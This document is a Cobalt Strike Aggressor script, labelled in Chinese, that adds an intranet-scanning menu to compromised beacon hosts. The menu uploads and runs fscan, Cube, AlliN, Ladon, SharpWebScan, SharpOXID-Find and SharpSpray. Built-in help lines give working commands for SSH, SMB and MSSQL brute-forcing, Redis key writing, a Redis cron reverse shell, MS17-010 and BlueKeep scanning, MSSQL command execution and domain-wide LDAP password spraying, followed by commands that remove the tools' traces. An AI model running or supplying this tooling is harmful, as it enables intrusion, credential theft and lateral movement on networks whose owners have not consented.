menu "☆ 内网扫描" {
  menu "Fscan (内网大保健)" {
    item "上传 Fscan" {
			blog($1, "\c9=========== 上传 Fscan ==========");
      $bid = $1;
      $dialog = dialog("上传fscan", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &fscan);
      dialog_description($dialog, "支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等。项目地址：https://github.com/shadow1ng/fscan");
      drow_text($dialog, "UploadPath",  "上传路径: ");
      dbutton_action($dialog, "上传");
      dialog_show($dialog);
    }
    sub fscan {
      bcd($bid, $3['UploadPath']);
      if (-is64 $bid['id']) {
        bupload($bid, script_resource("/scripts/IntrScan/x64/fscan.exe"));
      }else{
        bupload($bid, script_resource("/scripts/IntrScan/x86/fscan.exe"));
      }      
    }
    item "运行 Fscan" {
			blog($1, "\c9=========== 运行 Fscan ==========");
      $bid = $1['@'];
      btask($bid, "Fscan", "");      
      btask($bid, "fscan.exe -h 192.168.1.1/24                                    (默认使用全部模块)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/16                                    (B段扫描)", "");
      btask($bid, "其他用法：", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -np -no -nopoc                     (跳过存活检测、不保存文件、跳过web poc扫描)", "");            
      btask($bid, "fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub                     (redis 写公钥)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666               (redis 计划任务反弹shell)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt     (加载指定文件的用户名、密码来进行爆破)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt                      (指定扫描结果保存路径,默认保存在当前路径)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/8                                     (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -m smb -pwd password               (smb密码碰撞)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -c whoami                          (ssh 爆破成功后，命令执行)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -m ssh -p 2222                     (指定模块ssh和端口)", "");
      btask($bid, "fscan.exe -h 192.168.1.1/24 -m ms17010                         (指定模块)", "");
      btask($bid, "fscan.exe -h 192.0.0.0/8 -m icmp                               (探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)", "");
      btask($bid, " ", "");
      btask($bid, "fscan.exe -h      (查看完整使用方法)", "");
      $dialog = dialog("运行fscan",%(exec => "fscan.exe -h 192.168.1.1/24 -o out.txt", bid => $bid),&fscan_run);
      dialog_description($dialog, "请在下方输入运行指令：");
      drow_text($dialog, "exec", "Exec: ");
      dbutton_action($dialog, "运行");
      dialog_show($dialog);
    }
    sub fscan_run{
      $exec = $3['exec'];
      brun($bid, "$exec");
    }
    item "删除 Fscan" {
			blog($1, "\c9=========== 删除 Fscan ==========");
      $bid = $1['@'];
      bshell($bid, "taskkill -f /im fscan.exe & del /f /s /q fscan.exe & del /f /s /q out.txt");
    }
  }
	item "Ladon（多协议存活探测）" {
    #OnlinePC
    $bid = $1;
    $dialog = dialog("Ladon OnlineIP", %(tar => "192.168.1.1/24",moudle => "OnlineIP",clrver => "35",bid => $bid), &LadonScan);
    dialog_description($dialog, "Target: IP or CIDR or URL or Host or Domain");
    drow_text($dialog, "tar",  "Target:");
    drow_combobox($dialog, "moudle", "Moudle:", @("OnlinePC","OnlineIP","EthScan", "WebScan", "WhatCMS","CiscoScan","SameWeb","UrlScan","EnumMssql","EnumShare"));
    #drow_combobox($dialog, "clrver", "Version", @("35", "40"));
    drow_checkbox($dialog, 'type', 'noping');
    dbutton_action($dialog, "Scan");
    dialog_show($dialog);
	}
sub LadonScan {
	if (-exists script_resource("/scripts/InfoCollect/Ladon.exe")) {
    if ($3['tar'] eq ""){
      return;
    }else
    {
    if ($3['type'] eq 'true'){
      blog2($bid,"\c2Ladon noping ".$3['tar'].' '.$3['moudle']);
      bexecute_assembly!($bid, script_resource("/scripts/InfoCollect/Ladon.exe"),'noping '.$3['tar'].' '.$3['moudle']);
    }else
    {
      blog2($bid,"\c2Ladon ".$3['tar'].' '.$3['moudle']);
      bexecute_assembly!($bid, script_resource("/scripts/InfoCollect/Ladon.exe"), $3['tar'].' '.$3['moudle']);}}
    }else {berror($1, "Ladon.exe does not exist :(");}
}

  menu "Cube（模块化探测）"{
    item "上传 Cube" {
			blog($1, "\c9=========== 上传 Cube ==========");
      $bid = $1;
      $dialog = dialog("上传 Cube", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &cube_upload);
      dialog_description($dialog, "内网渗透测试工具，弱密码爆破、信息收集和漏洞扫描。项目地址：https://github.com/JKme/cube");
      drow_text($dialog, "UploadPath",  "上传路径: ");
      dbutton_action($dialog, "上传");
      dialog_show($dialog);
    }
    sub cube_upload {
      bcd($bid, $3['UploadPath']);
      if (-is64 $bid['id']) {
        bupload($bid, script_resource("/scripts/IntrScan/x64/cube.exe"));
      }else{
        bupload($bid, script_resource("/scripts/IntrScan/x86/cube.exe"));
      }      
    } 
    item "运行 Cube" {
			blog($1, "\c9=========== 运行 Cube ==========");
      $bid = $1['@'];
      btask($bid, "", "");
      btask($bid, "- Probe 内网信息收集模块", "");
      btask($bid, "ALL选项默认加载插件: docker,rmi,oxid,netbios,ntlm-smb,zookeeper", "");
      btask($bid, "其他可用插件：netbios，ms17010，smbghost，ntlm-wmi，ntlm-winrm，ntlm-mssql，dubbo，ping", "");
      btask($bid, "cube.exe probe -x ALL -i 192.168.2.1/24", "");     
      btask($bid, "cube.exe probe -x oxid -i 192.168.2.1/24", "");
      btask($bid, "cube.exe probe -x oxid,ms17010 -i 192.168.2.1/24", "");
      btask($bid, "", "");
      btask($bid, "- Crack 弱密码爆破模块", "");
      btask($bid, "可用插件：ssh，mysql，redis，elastic，ftp，httpbasic，mongo，mssql，smb，postgres", "");
      btask($bid, "cube.exe crack -u root -p root -i 192.168.1.1 -x ALL //加载全部可组合插件", "");            
      btask($bid, "cube.exe crack -u root -p root -i 192.168.1.1 -x ssh", "");
      btask($bid, "cube.exe crack -u root -p root -i 192.168.1.1 -x ssh --port 2222", "");
      btask($bid, "cube.exe crack -u root,ubuntu -p 123,000111,root -x ssh -i 192.168.1.1", "");
      btask($bid, "cube.exe crack -u root -p root -i 192.168.1.1/24 -x ssh", "");
      btask($bid, "cube.exe crack -u root --pass-file pass.txt -i 192.168.1.1/24 -x ssh,mysql", "");
      btask($bid, "phpmyadmin、httpbasic、jenkins、zabbix插件只能单独使用，不可组合:", "");
      btask($bid, "cube.exe crack -u root --pass-file pass.txt -i http://192.168.1.1 -x phpmyadmin", "");
      btask($bid, "cube.exe crack -u root --pass-file pass.txt -i http://192.168.1.1 -x zabbix", "");
      btask($bid, "", "");
      btask($bid, "- Sqlcmd 命令执行模块", "");
      btask($bid, "cube.exe sqlcmd -x mssql://172.16.157.163 -usa -p123456 -e \"whoami\"", "");
      btask($bid, "cube.exe sqlcmd -x mssql-wscript://172.16.157.163 -usa -p123456 -e \"whoami\"", "");
      btask($bid, "cube.exe sqlcmd -x mssql-com://172.16.157.163 -usa -p123456 -e \"whoami\"", "");
      btask($bid, "cube.exe sqlcmd -x mssql-clr://172.16.157.163 -usa -p123456 -e \"whoami\"", "");
      $dialog = dialog("运行 Cube",%(exec => "cube.exe probe -x ALL -i 192.168.1.1/24", bid => $bid),&cube_run);
      dialog_description($dialog, "请在下方输入运行指令：");
      drow_text($dialog, "exec", "Exec: ");
      dbutton_action($dialog, "运行");
      dialog_show($dialog);   
    }
    sub cube_run{
      $exec = $3['exec'];
      brun($bid, "$exec");
    }
    item "删除 Cube" {
			blog($1, "\c9=========== 删除 Cube ==========");
      $bid = $1['@'];
      bshell($bid, "taskkill -f /im cube.exe & del /f /s /q cube.exe");
    }
  }

  menu "Allin（辅助灵活扫描）"{
    item "上传 Allin" {
			blog($1, "\c9=========== 上传 Allin ==========");
      $bid = $1;
      $dialog = dialog("上传 Allin", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &allin_upload);
      dialog_description($dialog, "一款 Python 版无依赖扫描器，被动识别站点的一些架构信息，组件信息，框架信息，指纹数量1000+。项目地址：https://github.com/P1-Team/AlliN");
      drow_text($dialog, "UploadPath",  "上传路径: ");
      dbutton_action($dialog, "上传");
      dialog_show($dialog);
    }
    sub allin_upload {
      bcd($bid, $3['UploadPath']);
      if (-is64 $bid['id']) {
        bupload($bid, script_resource("/scripts/IntrScan/x64/Allin.exe"));
      }else{
        bupload($bid, script_resource("/scripts/IntrScan/x86/Allin.exe"));
      }      
    } 
    item "运行 Allin" {
			blog($1, "\c9=========== 运行 Allin ==========");
      $bid = $1['@'];
      btask($bid, "详细使用说明：https://github.com/P1-Team/AlliN", "");
      btask($bid, "AlliN.exe -m oxid --host 192.168.1.1/24 --nobar                  （获取远程主机网卡地址）", "");  
      btask($bid, "AlliN.exe --host 10.1.1.1/24 -m 17scan --nobar                   （17010 扫描）", "");
      btask($bid, "AlliN.exe --host 192.168.1.1/24 -m 0708scan -p 3389 --nobar      （0708 扫描）", "");
      btask($bid, "AlliN.exe --host 10.1.1.1/24 -p 80 -m pscan --nobar              （-p 指定端口 全端口使用参数-p-）", "");
      btask($bid, "AlliN.exe --host 10.1.1.1/24 -p 80 --nobar                       （Web title 扫描）", "");
      btask($bid, "AlliN.exe --host 192.168.1.1/24 -p 443 -m bakscan --nobar        （扫描后台）", "");
      btask($bid, "AlliN.exe --host 192.168.1.1/24 -p 443 -m bakscan --dd --nobar   （head 方式扫后台）", "");  
      $dialog = dialog("运行 Allin",%(exec => "AlliN.exe -m oxid --host 192.168.1.1/24 --nobar", bid => $bid),&allin_run);
      dialog_description($dialog, "请输入指令后确认已添加 --nobar 参数：");
      drow_text($dialog, "exec", "Exec: ");
      dbutton_action($dialog, "运行");
      dialog_show($dialog);   
    }
    sub allin_run{
      $exec = $3['exec'];
      brun($bid, "$exec");
    }
    item "删除 Allin" {
			blog($1, "\c9=========== 删除 Allin ==========");
      $bid = $1['@'];
      bshell($bid, "taskkill -f /im Allin.exe & del /f /s /q Allin.exe");
    }
  }

  item "SharpOXID-Find (OXID 探测)" {
			blog($1, "\c9=========== SharpOXID-Find (OXID 探测) ==========");
      $bid = $1['@'];
      $dialog = dialog("SharpOXID-Find", %(ip => "192.168.1.1/24",bid => $bid), &SharpOXID-Find);
      dialog_description($dialog, "OXID 解析器，用于探测多网口机器（依赖于 135 端口）,-i 扫描指定ip,-c 扫描C段。");
      drow_combobox($dialog, "type", "type:", @("-c","-i"));
      drow_text($dialog, "ip", "ip:  ");			
      dbutton_action($dialog, "运行");
      dialog_show($dialog);
  }
  sub SharpOXID-Find {
      $arg = join(' ',  @($3['type'],$3['ip']));
      bexecute_assembly($bid, script_resource("/scripts/IntrScan/SharpOXID-Find.exe"), $arg);
  }

  item "SharpWebScan (Web 探测)" {
			blog($1, "\c9=========== SharpWebScan (Web 探测) ==========");
    $bid = $1['@'];
    $dialog = dialog("SharpWebScan", %(iptype => "-IP",ip => beacon_info($bid,"internal"),port => "80,443,7001,8000,8001,8080,8888",bid => $bid), &SharpWebScan);
    dialog_description($dialog, "扫描IP或C段的Web服务，获取Title，可自定义多端口扫描，返回web地址和title。项目地址：https://github.com/RcoIl/CSharp-Tools/tree/master/SharpWebScan");
    drow_text($dialog, "ip", "ip:  ");
    drow_text($dialog, "port", "ports:  ");
    drow_combobox($dialog, "iptype", "-ip/-cip", @("-IP", "-CIP"));
    dbutton_action($dialog, "运行");
    dialog_show($dialog);
  }
  sub SharpWebScan (Web 服务) {
    $arg = join(' ', @($3['iptype'],$3['ip'],$3['port']));
    bexecute_assembly($bid, script_resource("/scripts/IntrScan/SharpWebScan.exe"), $arg);
  }

  item "SharpSpray (域内密码爆破)" {
			blog($1, "\c9=========== SharpSpray (域内密码爆破) ==========");
    $bid = $1['@'];
    $dialog = dialog("SharpSpray", %(passwd => "123,888",Delay => "1000",Sleep => "1",bid => $bid), &SharpSpray);
    dialog_description($dialog, "使用LDAP对域的所有用户执行密码喷雾攻击。seeds：指定几个密码生成字典，逗号分隔。passwords：指定密码爆破，可多个密码，逗号分隔。delay：密码喷雾的延迟，毫秒为单位。sleep：密码猜测之间sleep周期分钟数。项目地址：https://github.com/jnqpblc/SharpSpray");
    drow_combobox($dialog, "type", "type:", @("--Seeds","--Passwords"));
    drow_text($dialog, "passwd", "passwd:  ");
    drow_text($dialog, "Delay", "Delay:  ");
    drow_text($dialog, "Sleep", "Sleep:  ");
    dbutton_action($dialog, "运行");
    dialog_show($dialog);
  }
  sub SharpSpray {
    $arg = join(' ',  @($3['type'],$3['passwd'],"--Sleep",$3['Sleep'],"--Delay",$3['Delay']));
    bexecute_assembly($bid, script_resource("/scripts/IntrScan/SharpSpray.exe"), $arg);
  }

}
